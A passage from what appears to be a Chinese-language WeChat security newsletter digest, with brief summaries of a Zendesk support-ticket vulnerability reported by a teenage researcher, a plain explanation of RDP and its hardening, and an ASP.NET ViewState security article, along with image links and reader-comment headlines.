		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 Zendesk在多家财富500强公司中故意留下后门漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">15岁的黑客小伙佩尔在业余时间发现了一个漏洞，该漏洞允许攻击者通过Zendesk的电子邮件合作功能入侵包括超过一半的全球500强公司在内的企业的支持票据系统，并可能通过OAuth登录特性进一步入侵Slack工作空间。尽管Zendesk最初将这个问题标记为“不在作用域内”并拒绝修复，但最终在受影响公司的压力下修复了漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.2824074074074074" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=28636952&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp62RJalAICvlgBm7CYE4e8ZrrpTiaQhqWSKkeQRMVP9La0Wd58TI1OLiag%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.562037037037037" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=7304c939&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6icPJyMkk9t61vv6uXpDuL86WbkF6SVOPO2troQUv0775VwaDSfq1urw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.13149847094801223" data-w="654" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=932eea7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp64kDTt3xeibCj1eWfAB1mPXaz5PRnc2nok7cDKafR0J5raAGe1r7ed2Q%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zendesk 漏洞赏金：数百家公司后门敞开，最高奖励 5 万美元</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zendesk 漏洞赏金争议：漏洞被认定为“信息性”却未支付赏金</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6YXXUkNF7QgX5vqN38DpFkQA4yu1I48O4YBvymibRFicWSoQbhvCF9eDg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6YXXUkNF7QgX5vqN38DpFkQA4yu1I48O4YBvymibRFicWSoQbhvCF9eDg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858281244222581"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zendesk的安全漏洞可能会对使用其服务的公司造成严重影响，尤其是当这些公司包括全球500强企业时。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使是值得信赖的第三方服务提供商，也可能存在安全漏洞，这要求企业对这些服务进行适当的安全审计和监控。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">黑客攻击和漏洞利用可能会通过电子邮件系统的弱点进行，因此对于电子邮件的安全性和身份验证的严格性至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">企业在处理安全漏洞报告时的反应可能会受到公众和其他公司的压力，这可能会促使他们采取行动解决问题。</section></li></ul>
	<br/>
	<p>🏷️: Zendesk, 漏洞, 财富500强, 后门, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 远程桌面协议（RDP）简易解释</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">远程桌面协议（RDP）是一种流行的用于远程访问Windows计算机的协议，其复杂性和扩展性可能导致新的关键漏洞的发现，对安全行业的专业人士来说具有重要意义。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5481481481481482" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fccc5627&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp64z26iccVOTL1Jc1sGp809DJ2bGyqD0RnAhceibDS1k88cwnCiaYNpE3pQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">远程桌面协议 (RDP) 简单解释</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6xq57zQyLoic191cyJjr39p74Miay03kPLB13mUjjzjJYAcpdqXwSEqgQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6xq57zQyLoic191cyJjr39p74Miay03kPLB13mUjjzjJYAcpdqXwSEqgQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848581522282488"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RDP协议的复杂性和广泛的应用使其成为安全领域的关注重点。由于其多样的扩展和潜在的新漏洞，安全专业人士需要对其进行深入学习和研究。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RDP的安全性至关重要。近年来发现的关键漏洞，如BlueKeep和DejaBlue，表明了RDP协议安全性的脆弱性。这些漏洞可能被用来进行远程代码执行，因此需要采取措施，如使用增强型安全性和NLA，来提高RDP服务器的安全性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RDP协议的设计和实现允许高效的数据传输和良好的用户体验。通过使用多通道通信和数据压缩技术，RDP能够在网络上有效地传输图形和输入数据。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">为了保护RDP服务器免受攻击，应该采取一些最佳实践。这包括防止RDP服务器直接暴露在互联网上，以及启用网络层认证，以限制只有已认证的用户才能访问RDP服务。</section></li></ul>
	<br/>
	<p>🏷️: RDP, 远程访问, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07			<a href="https://mp.weixin.qq.com/s?__biz=MzkzNTUwNTg2Ng==&amp;mid=2247484605&amp;idx=1&amp;sn=e40ab30b6317c78b7889c13faf780151&amp;scene=21#wechat_redirect" style="color: rgb(0, 150, 136);border-style: none none solid;border-width: 1px;border-color: rgb(30, 107, 184) rgb(30, 107, 184) rgb(0, 150, 136);border-radius: 0px;" data-linktype="2"> 深入解析ViewState安全问题</a></span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文主要探讨了ASP.NET中ViewState机制的安全问题，包括不同配置、版本下的安全问题，以及如何从黑盒和白盒视角发现和利用这些问题，并最终提供了对ViewState处理流程的分析。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5518672199170125" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="964" src="https://wechat2rss.xlab.app/img-proxy/?k=f1e1a662&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp63kQxSic53xpSs8JNVa34VB9gN0KTmYpz9HVib9SDS485d3pzhX6qVOiag%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.3074074074074074" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=5573a624&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp60P2eThNDkBgSNHXPiboC3S8DltOibFlAb7OWHyiatelxGsJK2oFLV8MVQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.3333333333333333" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c5b11248&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6BiczsNwVUIjlN6JjlealwqGrTqS2LlgsHw8C3NggQ08yptNm1oNtowg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
